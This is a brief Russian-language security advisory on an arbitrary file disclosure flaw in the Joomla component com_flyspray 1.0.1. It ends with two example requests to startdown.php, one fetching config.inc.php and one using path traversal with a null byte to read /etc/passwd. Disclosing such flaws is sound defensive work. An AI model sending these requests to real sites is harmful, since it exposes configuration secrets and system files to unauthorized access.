Программа: com_flyspray 1.0.1
Уязвимость позволяет удаленному злоумышленнику получить несанкционированный доступ к конфиденциальной информации на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "file" сценарием startdown.php. Удаленный пользователь может получить содержимое произвольных файлов на целевой системе.
Пример:
http://[target]/[joomla_path]/components/com_flyspray/startdown.php? file=config.inc.php
http://[target]/[joomla_path]/components/com_flyspray/startdown.php? file=../../../../../etc/passwd%00
